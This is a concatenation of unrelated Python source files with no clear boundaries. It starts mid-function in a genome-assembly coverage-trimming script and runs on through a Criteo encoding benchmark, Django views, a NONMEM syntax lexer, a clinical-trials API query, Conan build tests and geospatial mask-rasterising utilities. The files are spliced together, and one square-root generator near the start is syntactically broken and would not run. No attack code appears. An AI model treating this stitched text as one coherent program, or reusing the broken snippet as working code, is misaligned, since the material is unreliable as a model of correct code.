'sourmashed-tax-screen.fasta') with open(sourTax, 'w') as outfile: with open(os.path.join(args.workdir,assembly_working), 'rU') as infile: for record in SeqIO.parse(infile, 'fasta'): if not record.id in Tax2Drop: SeqIO.write(record, outfile, 'fasta') # only do coverage trimming if reads provided Contigs2Drop = [] # this will be empty if no reads given to gather by coverage if forReads: #check if BAM present, if so skip running if not os.path.isfile(os.path.join(args.workdir, blobBAM)): # index bwa_index = ['bwa','index', os.path.basename(sourTax)] status('Building BWA index') printCMD(bwa_index) subprocess.run(bwa_index, cwd=args.workdir, stderr=DEVNULL) #mapped reads to assembly using BWA bwa_cmd = ['bwa','mem', '-t', str(args.cpus), os.path.basename(sourTax), # assembly index base forReads] if revReads: bwa_cmd.append(revReads) #run BWA and pipe to samtools sort status('Aligning reads to assembly with BWA') printCMD(bwa_cmd) p1 = subprocess.Popen(bwa_cmd, cwd=args.workdir, stdout=subprocess.PIPE, stderr=DEVNULL) p2 = subprocess.Popen(['samtools', 'sort', '--threads', str(bamthreads), '-o', blobBAM, '-'], cwd=args.workdir, stdout=subprocess.PIPE, stderr=DEVNULL, stdin=p1.stdout) p1.stdout.close() p2.communicate() subprocess.run(['samtools', 'index', blobBAM], cwd=args.workdir) #now calculate coverage from BAM file status('Calculating read coverage per contig') FastaBed = os.path.join(args.workdir, 'assembly.bed') lengths = [] with open(FastaBed, 'w') as bedout: with open(sourTax, 'rU') as SeqIn: for record in SeqIO.parse(SeqIn, 'fasta'): bedout.write('{:}\t{:}\t{:}\n'.format(record.id, 0, len(record.seq))) lengths.append(len(record.seq)) N50 = calcN50(lengths) Coverage = {} coverageBed = os.path.join(args.workdir, 'coverage.bed') cov_cmd = ['samtools', 'bedcov', os.path.basename(FastaBed), blobBAM] printCMD(cov_cmd) with open(coverageBed, 'w') as bed_out: for line in execute(cov_cmd, args.workdir): bed_out.write(line) if not line or line.startswith('\n') or line.count('\t') < 3: continue line = line.strip() cols = line.split('\t') cov = int(cols[3]) / float(cols[2]) Coverage[cols[0]] = (int(cols[2]), cov) #get average coverage of N50 contigs n50Cov = [] for k,v in Coverage.items(): if args.debug: print('{:}; Len: {:}; Cov: {:.2f}'.format(k, v[0], v[1])) if v[0] >= N50: n50Cov.append(v[1]) n50AvgCov = sum(n50Cov) / len(n50Cov) minpct = args.mincovpct / 100 # should we make this a variable? 5% was something arbitrary min_coverage = float(n50AvgCov * minpct) status('Average coverage for N50 contigs is {:}X'.format(int(n50AvgCov))) #Start list of contigs to drop for k,v in Coverage.items(): if v[1] <= min_coverage: Contigs2Drop.append(k) status('Found {:,} contigs with coverage less than {:.2f}X ({:}%)'. format(len(Contigs2Drop), min_coverage, args.mincovpct)) if args.debug: print('Contigs dropped due to coverage: {:,}'.format(','.join(Contigs2Drop))) print('Contigs dropped due to taxonomy: {:,}'.format(','.join(Tax2Drop))) DropFinal = Contigs2Drop + Tax2Drop DropFinal = set(DropFinal) status('Dropping {:,} total contigs based on taxonomy and coverage'.format(len(DropFinal))) with open(args.outfile, 'w') as outfile, open(sourTax, 'rU') as seqin: for record in SeqIO.parse(seqin, 'fasta'): if not record.id in DropFinal: SeqIO.write(record, outfile, 'fasta') numSeqs, assemblySize = fastastats(args.outfile) status('Sourpurged assembly is {:,} contigs and {:,} bp'. format(numSeqs, assemblySize)) if '_' in args.outfile: nextOut = args.outfile.split('_')[0]+'.rmdup.fasta' elif '.' in args.outfile: nextOut = args.outfile.split('.')[0]+'.rmdup.fasta' else: nextOut = args.outfile+'.rmdup.fasta' if checkfile(sourmashTSV): baseinput = os.path.basename(args.input) if '.' in baseinput: baseinput = baseinput.rsplit('.',1)[0] os.rename(sourmashTSV, baseinput+'.sourmash-taxonomy.csv') if not args.debug: SafeRemove(args.workdir) if not args.pipe: status('Your next command might be:\n\tAAFTF rmdup -i {:} -o {:}\n'.format(args.outfile, nextOut)) slst = [1,4,9,16,25,36,49,64,81] def mySqrt(n): for i in range(len(slst)): if n < slst[i]: break yield i rem = n - slst[i] ret = [i] while 1: rem *= 100 for b in range(0,10): if ret.extend(b) * b < rem: continue else break ret = rem - ret.extend(b) s = mySqrt(2) for i in range(10): print s.next() damslab/reproducibility import sys import time import numpy as np import scipy as sp from scipy.sparse import csr_matrix import pandas as pd import math import warnings from sklearn.pipeline import make_pipeline from sklearn.compose import ColumnTransformer from sklearn.pipeline import Pipeline, FeatureUnion from sklearn.base import BaseEstimator, TransformerMixin from sklearn import preprocessing from nimbusml.feature_extraction.categorical import OneHotVectorizer # Make numpy values easier to read. np.set_printoptions(precision=3, suppress=True) warnings.filterwarnings('ignore') #cleaner, but not recommended def readNprep(nRows): # Read the 1M or the 10M dataset if nRows == 1: print("Reading file: criteo_day21_1M") criteo = pd.read_csv("~/datasets/criteo_day21_1M", delimiter=",", header=None) if nRows == 10: print("Reading file: criteo_day21_10M") criteo = pd.read_csv("~/datasets/criteo_day21_10M", delimiter=",", header=None) print(criteo.head()) # Replace NaNs with 0 for numeric and empty string for categorical criteo = criteo.apply(lambda x: x.fillna(0) if x.dtype.kind in 'biufc' else x.fillna('')) pt = [*range(0,14)] criteo[pt] = criteo[pt].astype(float) pt = [*range(14,40)] criteo[pt] = criteo[pt].astype(str) #print(criteo.info()) return criteo def transform(X): # Seperate categorical features print(X.columns) cat = list(X.columns[14:40]) # Rename columns from number to alpha-numeric all_cols = list(X.columns[0:40]) new_cols = ['C' + str(i) for i in all_cols] X.columns = new_cols print(X.head()) cat_cols = ['C' + str(i) for i in cat] # Execute OneHot on all categorical columns # NOTE: the fit_transform call never completes. Killed after long time. t_t = time.time() #xf = OneHotVectorizer() << ['C35'] xf = OneHotVectorizer() << cat_cols print(xf.fit_transform(X)) print("Elapsed time for Transform = %s sec" % (time.time() - t_t)) X = readNprep(1) t2 = time.time() transform(X) print("Elapsed time for transformations using mlnet = %s sec" % (time.time() - t2)) junkhp/esuites_database_modification from django.shortcuts import render, redirect, get_object_or_404 from django.views.generic import ListView, DetailView, DeleteView, UpdateView from django import forms from django.urls import reverse_lazy, reverse from django.views import View from django.contrib.auth import authenticate, login, logout from django.contrib.auth.decorators import login_required from django.contrib.auth.mixins import LoginRequiredMixin from pprint import pprint from django.db.models import Q # Create your views here. class IndexView(View): '''トップページを表示''' def get(self, request): template_name = 'esuits/index.html' return render(request, template_name) ############################################################################### # Name: nonmem.py # # Purpose: Define NONMEM syntax for highlighting and other features # # Author: <> # # Copyright: (c) 2008 () # # (c) 2008 (none_yet) # # (c) 2010 () # # License: wxWindows License # ############################################################################### """ FILE: nonmem.py AUTHOR: , , @summary: Lexer configuration module for NONMEM control streams. """ __author__ = " , " __svnid__ = "$Id: _nonmem.py 70229 2012-01-01 01:27:10Z CJP $" __revision__ = "$Revision: 70229 $" #-----------------------------------------------------------------------------# # Imports import wx.stc as stc from pygments.lexer import RegexLexer, include, bygroups from pygments.token import Token, Text, Comment, Operator, \ Keyword, Name, String, Number, Punctuation import re #Local Imports import synglob import syndata #-----------------------------------------------------------------------------# # Style Id's # Style Id's STC_NONMEM_DEFAULT, \ STC_NONMEM_COMMENT, \ STC_NONMEM_NUMBER, \ STC_NONMEM_STRING, \ STC_NONMEM_STRINGEOL, \ STC_NONMEM_OPERATOR, \ STC_NONMEM_NAME, \ STC_NONMEM_ABSTRACTRULE, \ STC_NONMEM_FEATURE, \ STC_NONMEM_CROSSREF, \ STC_NONMEM_PACKAGE, \ STC_NONMEM_KEYWORD, \ STC_NONMEM_KEYWORD_PSEUDO = range(13) #-----------------------------------------------------------------------------# #---- Keyword Specifications ----# # Xtext Keywords KEYWORDS = ("grammar generate import returns enum terminal hidden with as current") TERMINALS = ("ID INT STRING") #---- Syntax Style Specs ----# SYNTAX_ITEMS = [ (STC_NONMEM_DEFAULT, 'default_style'), (STC_NONMEM_COMMENT, 'comment_style'), (STC_NONMEM_NUMBER, 'number_style'), (STC_NONMEM_STRING, 'string_style'), (STC_NONMEM_STRINGEOL, 'stringeol_style'), (STC_NONMEM_OPERATOR, 'operator_style'), (STC_NONMEM_NAME, 'default_style'), (STC_NONMEM_ABSTRACTRULE, 'keyword3_style'), (STC_NONMEM_FEATURE, 'default_style'), (STC_NONMEM_CROSSREF, 'class_style'), (STC_NONMEM_PACKAGE, 'class_style'), (STC_NONMEM_KEYWORD, 'keyword_style'), (STC_NONMEM_KEYWORD_PSEUDO, 'keyword2_style'), ] NONMEM_KEYWORDS = ("ADVAN\d+ BLOCK COMP COND CONDITIONAL DEFDOSE DEFOBS " "DOWHILE ELSE ENDDO ENDIF EXP FILE FIX FIXED ICALL IF " "IGNORE INTER INTERACTION LOG MATRIX MAX MAXEVAL METHOD " "NEWIND NOABORT NOAPPEND NOPRINT NOHEADER ONEHEADER PRINT " "SIG SIGDIGITS SLOW SUBPROBLEMS THEN TOL TRANS1 TRANS2 " "TRANS3 TRANS4 ONLYSIM ENDIF") NONMEM_PARAMS = "DADT ERR EPS ETA THETA" #NONMEM_SPECIAL = "\$COV $DATA $DES $ERROR $EST \$INPUT $MODEL $OMEGA $PRED \\$PK $PROB $PROBLEM $SIGMA $SIM $SUB $TABLE $THETA" #-----------------------------------------------------------------------------# class SyntaxData(syndata.SyntaxDataBase): """SyntaxData object for IssueLists This class is primarily intended as an example to creating a custom lexer. """ def __init__(self, langid): super(SyntaxData, self).__init__(langid) # Setup self.SetLexer(stc.STC_LEX_CONTAINER) self.RegisterFeature(synglob.FEATURE_STYLETEXT, StyleText) def GetSyntaxSpec(self): """Syntax Specifications """ return SYNTAX_ITEMS #---- End Required Module Functions ----# def StyleText(_stc, start, end): """Style the text @param _stc: Styled text control instance @param start: Start position @param end: end position """ for index, token, txt in lexer.get_tokens_unprocessed(_stc.GetTextRange(0, end)): # print index, token, txt style = TOKEN_MAP.get(token, STC_NONMEM_DEFAULT) # print "Text=%s, len=%s" % (txt, len(txt)) _stc.StartStyling(index, 0x1f) tlen = len(txt) if tlen: _stc.SetStyling(len(txt), style) TOKEN_MAP = { Token.String : STC_NONMEM_STRING, Token.Comment.Multiline : STC_NONMEM_COMMENT, Token.Comment.Single : STC_NONMEM_COMMENT, Token.Operator : STC_NONMEM_OPERATOR, Token.Punctuation : STC_NONMEM_OPERATOR, Token.Number.Integer : STC_NONMEM_NUMBER, Token.Keyword : STC_NONMEM_KEYWORD, Token.Keyword.Pseudo: STC_NONMEM_KEYWORD_PSEUDO, Token.Name : STC_NONMEM_NAME, Token.Name.AbstractRule : STC_NONMEM_ABSTRACTRULE, Token.Name.Feature : STC_NONMEM_FEATURE, Token.Name.CrossRef : STC_NONMEM_CROSSREF, Token.Name.Package : STC_NONMEM_PACKAGE, Token.Name.Package.EMF : STC_NONMEM_PACKAGE} class NONMEMLexer(RegexLexer): """ Nonmem lexer based on statefull RegexLexer from pygments library. """ name = 'NONMEM' aliases = ['nonmem'] filenames = ['*.ctl'] mimetypes = ['text/x-nonmem'] flags = re.MULTILINE | re.DOTALL # | re.UNICODE #: optional Comment or Whitespace #_ws = r'(?:\s|//.*?\n|/[*].*?[*]/)+' def AltWords(words): """Makes lexer rule for alternative words from the given words list. @param words: string consisting of space separated words @return: string in the form \\bword1\\b|\\bword2\\b|\\bword3\\b... """ return "|".join([ "\\b%s\\b" % w for w in words.split()]) _ident = r'\^?[a-zA-Z_\$][a-zA-Z0-9_]*' tokens = { 'root': [ (include('first')), (_ident + r'(\.' + _ident + r')+', Name.Package), ('(' + _ident + r')(\s*)(returns)', bygroups(Name.AbstractRule, Text.Whitespace, Keyword), 'parserrule'), ('(' + _ident + r')(\s*)(:)', bygroups(Name.AbstractRule, Text.Whitespace, Punctuation), 'parserrule'), (_ident, Name), ], 'first': [ (r';[^\n]*$', Comment.Single), (r'\$[A-Z]+', Name.Package), (r'[ \t]+', Text.Whitespace), (r'"(\\\\|\\"|[^"])*"', String), (r"'(\\\\|\\'|[^'])*'", String), (r'\*|\?|\+|!|\||=|\?=|\+=|\.\.|->', Operator), (r'[()\[\]{}:]', Punctuation), (r'[0-9]+', Number.Integer), (AltWords(NONMEM_KEYWORDS), Keyword), (AltWords(NONMEM_PARAMS), Keyword.Pseudo), # (AltWords(NONMEM_SPECIAL), Name.Package), ], 'parserrule': [ (include('first')), ('(' + _ident + r'(\.' + _ident + r')?)([ \t]*)(=|\?=|\+=)', bygroups(Name.Feature, Text.Whitespace, Operator)), (_ident + r'(\.' + _ident + r')+', Name.Package), (_ident, Name.CrossRef), ], } lexer = NONMEMLexer() if __name__=='__main__': import codecs, sys ftext = codecs.open(sys.argv[1], "r", "utf-8") text = ftext.read() ftext.close() line=1 for index, token, txt in lexer.get_tokens_unprocessed(text): if token is Token.EndOfLine: line += 1 print( line, token, txt) 0 import json import urllib.request import itertools import statistics import pandas as pd from nltk.tokenize import word_tokenize stack=[] name = input('What is your problem dude ? ') query=word_tokenize(name) x = "+".join(query) myTuple = ("https://clinicaltrials.gov/api/query/full_studies?expr=",x,"&min_rnk=1&max_rnk=100&fmt=json") #url="https://clinicaltrials.gov/api/query/full_studies?expr=heart+attack&min_rnk=1&max_rnk=100&fmt=json" y ="".join(myTuple) url=y list1=[] list2=[] list3=[] with urllib.request.urlopen(url) as url: s = url.read() data = json.loads(s) #data is dictonart datatype data= data.get('FullStudiesResponse').get('FullStudies') j=0 while j<100: for i in data[j].get('Study').get('DerivedSection').get('ConditionBrowseModule').get('ConditionMeshList').get('ConditionMesh'): list1.append(i.get('ConditionMeshTerm')) #print(i.get('ConditionMeshTerm')) j=j+1 j=0 while j<100: for i in data[j].get('Study').get('DerivedSection').get('ConditionBrowseModule').get('ConditionAncestorList').get('ConditionAncestor'): list2.append(i.get('ConditionAncestorTerm')) #print(i.get('ConditionMeshTerm')) j=j+1 j=0 while j<100: for i in data[j].get('Study').get('DerivedSection').get('ConditionBrowseModule').get('ConditionBrowseLeafList').get('ConditionBrowseLeaf'): list3.append(i.get('ConditionBrowseLeafName')) #print(i.get('ConditionMeshTerm')) j=j+1 #print(list1,list2,list3) list1.extend(list2) list1.extend(list3) s = [] for i in list1: if i not in s: s.append(i) print(s) print("end") def is_power_of_2(num): """ Returns whether num is a power of two or not :param num: an integer positive number :return: True if num is a power of 2, False otherwise """ return num != 0 and ((num & (num - 1)) == 0) def next_power_of_2(x): """ Returns the first power of two >= x, so f(2) = 2, f(127) = 128, f(65530) = 65536 :param x: :return: """ # NOTES for this black magic: # * .bit_length returns the number of bits necessary to represent self in binary # * x << y means 1 with the bits shifted to the left by y, which is the same as multiplying x by 2**y (but faster) return 1 << (x - 1).bit_length() import os import platform import textwrap import unittest from nose.plugins.attrib import attr from conans.test.utils.tools import TestClient from conans.util.files import load @attr('slow') class CMakeFindPathMultiGeneratorTest(unittest.TestCase): def test_native_export_multi(self): """ bye depends on hello. Both use find_package in their CMakeLists.txt The consumer depends on bye, using the cmake_find_package_multi generator """ c = TestClient() project_folder_name = "project_targets" assets_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), "assets/cmake_find_package_multi") c.copy_from_assets(assets_path, ["bye", "hello", project_folder_name]) # Create packages for hello and bye for p in ("hello", "bye"): for bt in ("Debug", "Release"): c.run("create {} user/channel -s build_type={}".format(p, bt)) with c.chdir(project_folder_name): # Save conanfile and example conanfile = textwrap.dedent(""" [requires] bye/1.0@user/channel [generators] cmake_find_package_multi """) example_cpp = textwrap.dedent(""" #include #include "bye.h" int main() { bye(); } """) c.save({"conanfile.txt": conanfile, "example.cpp": example_cpp}) with c.chdir("build"): for bt in ("Debug", "Release"): c.run("install .. user/channel -s build_type={}".format(bt)) # Test that we are using find_dependency with the NO_MODULE option # to skip finding first possible FindBye somewhere self.assertIn("find_dependency(hello REQUIRED NO_MODULE)", load(os.path.join(c.current_folder, "byeConfig.cmake"))) if platform.system() == "Windows": c.run_command('cmake .. -G "Visual Studio 15 Win64"') c.run_command('cmake --build . --config Debug') c.run_command('cmake --build . --config Release') c.run_command('Debug\\example.exe') self.assertIn("Hello World Debug!", c.out) self.assertIn("bye World Debug!", c.out) c.run_command('Release\\example.exe') self.assertIn("Hello World Release!", c.out) self.assertIn("bye World Release!", c.out) else: for bt in ("Debug", "Release"): c.run_command('cmake .. -DCMAKE_BUILD_TYPE={}'.format(bt)) c.run_command('cmake --build .') c.run_command('./example') self.assertIn("Hello World {}!".format(bt), c.out) self.assertIn("bye World {}!".format(bt), c.out) os.remove(os.path.join(c.current_folder, "example")) 10-100 from ..utils.core import _check_df_load, _check_geom, _check_crs from ..utils.core import _check_skimage_im_load, _check_rasterio_im_load from ..utils.geo import gdf_get_projection_unit, reproject from ..utils.geo import geometries_internal_intersection from ..utils.tile import save_empty_geojson from .polygon import georegister_px_df, geojson_to_px_gdf, affine_transform_gdf import numpy as np from shapely.geometry import shape from shapely.geometry import Polygon import geopandas as gpd import pandas as pd import rasterio from rasterio import features from affine import Affine from skimage.morphology import square, erosion, dilation import os from tqdm import tqdm def df_to_px_mask(df, channels=['footprint'], out_file=None, reference_im=None, geom_col='geometry', do_transform=None, affine_obj=None, shape=(900, 900), out_type='int', burn_value=255, **kwargs): """Convert a dataframe of geometries to a pixel mask. Arguments --------- df : :class:`pandas.DataFrame` or :class:`geopandas.GeoDataFrame` A :class:`pandas.DataFrame` or :class:`geopandas.GeoDataFrame` instance with a column containing geometries (identified by `geom_col`). If the geometries in `df` are not in pixel coordinates, then `affine` or `reference_im` must be passed to provide the transformation to convert. channels : list, optional The mask channels to generate. There are three values that this can contain: - ``"footprint"``: Create a full footprint mask, with 0s at pixels that don't fall within geometries and `burn_value` at pixels that do. - ``"boundary"``: Create a mask with geometries outlined. Use `boundary_width` to set how thick the boundary will be drawn. - ``"contact"``: Create a mask with regions between >= 2 closely juxtaposed geometries labeled. Use `contact_spacing` to set the maximum spacing between polygons to be labeled. Each channel correspond to its own `shape` plane in the output. out_file : str, optional Path to an image file to save the output to. Must be compatible with :class:`rasterio.DatasetReader`. If provided, a `reference_im` must be provided (for metadata purposes). reference_im : :class:`rasterio.DatasetReader` or `str`, optional An image to extract necessary coordinate information from: the affine transformation matrix, the image extent, etc. If provided, `affine_obj` and `shape` are ignored. geom_col : str, optional The column containing geometries in `df`. Defaults to ``"geometry"``. do_transform : bool, optional Should the values in `df` be transformed from geospatial coordinates to pixel coordinates? Defaults to ``None``, in which case the function attempts to infer whether or not a transformation is required based on the presence or absence of a CRS in `df`. If ``True``, either `reference_im` or `affine_obj` must be provided as a source for the the required affine transformation matrix. affine_obj : `list` or :class:`affine.Affine`, optional Affine transformation to use to convert from geo coordinates to pixel space. Only provide this argument if `df` is a :class:`geopandas.GeoDataFrame` with coordinates in a georeferenced coordinate space. Ignored if `reference_im` is provided. shape : tuple, optional An ``(x_size, y_size)`` tuple defining the pixel extent of the output mask. Ignored if `reference_im` is provided. burn_value : `int` or `float` The value to use for labeling objects in the mask. Defaults to 255 (the max value for ``uint8`` arrays). The mask array will be set to the same dtype as `burn_value`. kwargs Additional arguments to pass to `boundary_mask` or `contact_mask`. See those functions for requirements. Returns ------- mask : :class:`numpy.array` A pixel mask with 0s for non-object pixels and `burn_value` at object pixels. `mask` dtype will coincide with `burn_value`. Shape will be ``(shape[0], shape[1], len(channels))``, with channels ordered per the provided `channels` `list`. """ if isinstance(channels, str): # e.g. if "contact", not ["contact"] channels = [channels] if out_file and not reference_im: raise ValueError( 'If saving output to file, `reference_im` must be provided.') mask_dict = {} if 'footprint' in channels: mask_dict['footprint'] = footprint_mask( df=df, reference_im=reference_im, geom_col=geom_col, do_transform=do_transform, affine_obj=affine_obj, shape=shape, out_type=out_type, burn_value=burn_value ) if 'boundary' in channels: mask_dict['boundary'] = boundary_mask( footprint_msk=mask_dict.get('footprint', None), reference_im=reference_im, geom_col=geom_col, boundary_width=kwargs.get('boundary_width', 3), boundary_type=kwargs.get('boundary_type', 'inner'), burn_value=burn_value, df=df, affine_obj=affine_obj, shape=shape, out_type=out_type ) if 'contact' in channels: mask_dict['contact'] = contact_mask( df=df, reference_im=reference_im, geom_col=geom_col, affine_obj=affine_obj, shape=shape, out_type=out_type, contact_spacing=kwargs.get('contact_spacing', 10), burn_value=burn_value, meters=kwargs.get('meters', False) ) output_arr = np.stack([mask_dict[c] for c in channels], axis=-1) if reference_im: reference_im = _check_rasterio_im_load(reference_im) if out_file: meta = reference_im.meta.copy() meta.update(count=output_arr.shape[-1]) meta.update(dtype='uint8') with rasterio.open(out_file, 'w', **meta) as dst: # I hate band indexing. for c in range(1, 1 + output_arr.shape[-1]): dst.write(output_arr[:, :, c-1], indexes=c) return output_arr def footprint_mask(df, out_file=None, reference_im=None, geom_col='geometry', do_transform=None, affine_obj=None, shape=(900, 900), out_type='int', burn_value=255, burn_field=None): """Convert a dataframe of geometries to a pixel mask. Arguments --------- df : :class:`pandas.DataFrame` or :class:`geopandas.GeoDataFrame` A :class:`pandas.DataFrame` or :class:`geopandas.GeoDataFrame` instance with a column containing geometries (identified by `geom_col`). If the geometries in `df` are not in pixel coordinates, then `affine` or `reference_im` must be passed to provide the transformation to convert. out_file : str, optional Path to an image file to save the output to. Must be compatible with :class:`rasterio.DatasetReader`. If provided, a `reference_im` must be provided (for metadata purposes). reference_im : :class:`rasterio.DatasetReader` or `str`, optional An image to extract necessary coordinate information from: the affine transformation matrix, the image extent, etc. If provided, `affine_obj` and `shape` are ignored. geom_col : str, optional The column containing geometries in `df`. Defaults to ``"geometry"``. do_transform : bool, optional Should the values in `df` be transformed from geospatial coordinates to pixel coordinates? Defaults to ``None``, in which case the function attempts to infer whether or not a transformation is required based on the presence or absence of a CRS in `df`. If ``True``, either `reference_im` or `affine_obj` must be provided as a source for the the required affine transformation matrix. affine_obj : `list` or :class:`affine.Affine`, optional Affine transformation to use to convert from geo coordinates to pixel space. Only provide this argument if `df` is a :class:`geopandas.GeoDataFrame` with coordinates in a georeferenced coordinate space. Ignored if `reference_im` is provided. shape : tuple, optional An ``(x_size, y_size)`` tuple defining the pixel extent of the output mask. Ignored if `reference_im` is provided. out_type : 'float' or 'int' burn_value : `int` or `float`, optional The value to use for labeling objects in the mask. Defaults to 255 (the max value for ``uint8`` arrays). The mask array will be set to the same dtype as `burn_value`. Ignored if `burn_field` is provided. burn_field : str, optional Name of a column in `df` that provides values for `burn_value` for each independent object. If provided, `burn_value` is ignored. Returns ------- mask : :class:`numpy.array` A pixel mask with 0s for non-object pixels and `burn_value` at object pixels. `mask` dtype will coincide with `burn_value`. """ # start with required checks and pre-population of values if out_file and not reference_im: raise ValueError( 'If saving output to file, `reference_im` must be provided.') df = _check_df_load(df) if len(df) == 0 and not out_file: return np.zeros(shape=shape, dtype='uint8') if do_transform is None: # determine whether or not transform should be done do_transform = _check_do_transform(df, reference_im, affine_obj) df[geom_col] = df[geom_col].apply(_check_geom) # load in geoms if wkt if not do_transform: affine_obj = Affine(1, 0, 0, 0, 1, 0) # identity transform if reference_im: reference_im = _check_rasterio_im_load(reference_im) shape = reference_im.shape if do_transform: affine_obj = reference_im.transform # extract geometries and pair them with burn values if burn_field: if out_type == 'int': feature_list = list(zip(df[geom_col], df[burn_field].astype('uint8'))) else: feature_list = list(zip(df[geom_col], df[burn_field].astype('float32'))) else: feature_list = list(zip(df[geom_col], [burn_value]*len(df))) if len(df) > 0: output_arr = features.rasterize(shapes=feature_list, out_shape=shape, transform=affine_obj) else: output_arr = np.zeros(shape=shape, dtype='uint8') if out_file: meta = reference_im.meta.copy() meta.update(count=1) if out_type == 'int': meta.update(dtype='uint8') meta.update(nodata=0) with rasterio.open(out_file, 'w', **meta) as dst: dst.write(output_arr, indexes=1) return output_arr def boundary_mask(footprint_msk=None, out_file=None, reference_im=None, boundary_width=3, boundary_type='inner', burn_value=255, **kwargs): """Convert a dataframe of geometries to a pixel mask. Note ---- This function requires creation of a footprint mask before it can operate; therefore, if there is no footprint mask already present, it will create one. In that case, additional arguments for :func:`footprint_mask` (e.g. ``df``) must be passed. By default, this function draws boundaries *within* the edges of objects. To change this behavior, use the `boundary_type` argument. Arguments --------- footprint_msk : :class:`numpy.array`, optional A filled in footprint mask created using :func:`footprint_mask`. If not provided, one will be made by calling :func:`footprint_mask` before creating the boundary mask, and the required arguments for that function must be provided as kwargs. out_file : str, optional Path to an image file to save the output to. Must be compatible with :class:`rasterio.DatasetReader`. If provided, a `reference_im` must be provided (for metadata purposes). reference_im : :class:`rasterio.DatasetReader` or `str`, optional An image to extract necessary coordinate information from: the affine transformation matrix, the image extent, etc. If provided, `affine_obj` and `shape` are ignored boundary_width : int, optional The width of the boundary to be created **in pixels.** Defaults to 3. boundary_type : ``"inner"`` or ``"outer"``, optional Where to draw the boundaries: within the object (``"inner"``) or outside of it (``"outer"``). Defaults to ``"inner"``. burn_value : `int`, optional The value to use for labeling objects in the mask. Defaults to 255 (the max value for ``uint8`` arrays). The mask array will be set to the same dtype as `burn_value`. Ignored if `burn_field` is provided. **kwargs : optional Additional arguments to pass to :func:`footprint_mask` if one needs to be created. Returns ------- boundary_mask : :class:`numpy.array` A pixel mask with 0s for non-object pixels and the same value as the footprint mask `burn_value` for the boundaries of each object. """ if out_file and not reference_im: raise ValueError( 'If saving output to file, `reference_im` must be provided.') if reference_im: reference_im = _check_rasterio_im_load(reference_im) # need to have a footprint mask for this function, so make it if not given if footprint_msk is None: footprint_msk = footprint_mask(reference_im=reference_im, burn_value=burn_value, **kwargs) # perform dilation or erosion of `footprint_mask` to get the boundary strel = square(boundary_width) if boundary_type == 'outer': boundary_mask = dilation(footprint_msk, strel) elif boundary_type == 'inner': boundary_mask = erosion(footprint_msk, strel) # use xor operator between border and footprint mask to get _just_ boundary boundary_mask = boundary_mask ^ footprint_msk # scale the `True` values to burn_value and return boundary_mask = boundary_mask > 0 # need to binarize to get burn val right output_arr = boundary_mask.astype('uint8')*burn_value if out_file: meta = reference_im.meta.copy() meta.update(count=1) meta.update(dtype='uint8') with rasterio.open(out_file, 'w', **meta) as dst: dst.write(output_arr, indexes=1) return output_arr def contact_mask(df, contact_spacing=10, meters=False, out_file=None, reference_im=None, geom_col='geometry', do_transform=None, affine_obj=None, shape=(900, 900), out_type='int', burn_value=255): """Create a pixel mask labeling closely juxtaposed objects. Notes ----- This function identifies pixels in an image that do not correspond to objects, but fall within `contact_spacing` of >1 labeled object. Arguments --------- df : :class:`pandas.DataFrame` or :class:`geopandas.GeoDataFrame` A :class:`pandas.DataFrame` or :class:`geopandas.GeoDataFrame` instance with a column containing geometries (identified by `geom_col`). If the geometries in `df` are not in pixel coordinates, then `affine` or `reference_im` must be passed to provide the transformation to convert. contact_spacing : `int` or `float`, optional The desired maximum distance between adjacent polygons to be labeled as contact. Will be in pixel units unless ``meters=True`` is provided. meters : bool, optional Should `width` be defined in units of meters? Defaults to no (``False``). If ``True`` and `df` is not in a CRS with metric units, the function will attempt to transform to the relevant CRS using ``df.to_crs()`` (if `df` is a :class:`geopandas.GeoDataFrame`) or using the data provided in `reference_im` (if not). out_file : str, optional Path to an image file to save the output to. Must be compatible with :class:`rasterio.DatasetReader`. If provided, a `reference_im` must be provided (for metadata purposes). reference_im : :class:`rasterio.DatasetReader` or `str`, optional An image to extract necessary coordinate information from: the affine transformation matrix, the image extent, etc. If provided, `affine_obj` and `shape` are ignored. geom_col : str, optional The column containing geometries in `df`. Defaults to ``"geometry"``. do_transform : bool, optional Should the values in `df` be transformed from geospatial coordinates to pixel coordinates? Defaults to ``None``, in which case the function attempts to infer whether or not a transformation is required based on the presence or absence of a CRS in `df`. If ``True``, either `reference_im` or `affine_obj` must be provided as a source for the the required affine transformation matrix. affine_obj : `list` or :class:`affine.Affine`, optional Affine transformation to use to convert from geo coordinates to pixel space. Only provide this argument if `df` is a :class:`geopandas.GeoDataFrame` with coordinates in a georeferenced coordinate space. Ignored if `reference_im` is provided. shape : tuple, optional An ``(x_size, y_size)`` tuple defining the pixel extent of the output mask. Ignored if `reference_im` is provided. out_type : 'float' or 'int' burn_value : `int` or `float`, optional The value to use for labeling objects in the mask. Defaults to 255 (the max value for ``uint8`` arrays). The mask array will be set to the same dtype as `burn_value`. Returns ------- output_arr : :class:`numpy.array` A pixel mask with `burn_value` at contact points between polygons. """ if out_file and not reference_im: raise ValueError( 'If saving output to file, `reference_im` must be provided.') df = _check_df_load(df) if len(df) == 0 and not out_file: return np.zeros(shape=shape, dtype='uint8') if do_transform is None: # determine whether or not transform should be done do_transform = _check_do_transform(df, reference_im, affine_obj) df[geom_col] = df[geom_col].apply(_check_geom) # load in geoms if wkt if reference_im: reference_im = _check_rasterio_im_load(reference_im) buffered_geoms = buffer_df_geoms(df, contact_spacing/2., meters=meters, reference_im=reference_im, geom_col=geom_col, affine_obj=affine_obj) buffered_geoms = buffered_geoms[geom_col] # create a single multipolygon that covers all of the intersections if len(df) > 0: intersect_poly = geometries_internal_intersection(buffered_geoms) else: intersect_poly = Polygon() # handle case where there's no intersection if intersect_poly.is_empty: output_arr = np.zeros(shape=shape, dtype='uint8') else: # create a df containing the intersections to make footprints from df_for_footprint = pd.DataFrame({'shape_name': ['overlap'], 'geometry': [intersect_poly]}) # catch bowties df_for_footprint['geometry'] = df_for_footprint['geometry'].apply( lambda x: x.buffer(0) ) # use `footprint_mask` to create the overlap mask contact_msk = footprint_mask( df_for_footprint, reference_im=reference_im, geom_col='geometry', do_transform=do_transform, affine_obj=affine_obj, shape=shape, out_type=out_type, burn_value=burn_value ) footprint_msk = footprint_mask( df, reference_im=reference_im, geom_col=geom_col, do_transform=do_transform, affine_obj=affine_obj, shape=shape, out_type=out_type, burn_value=burn_value ) contact_msk[footprint_msk > 0] = 0 contact_msk = contact_msk > 0 output_arr = contact_msk.astype('uint8')*burn_value if out_file: meta = reference_im.meta.copy() meta.update(count=1) if out_type == 'int': meta.update(dtype='uint8') with rasterio.open(out_file, 'w', **meta) as dst: 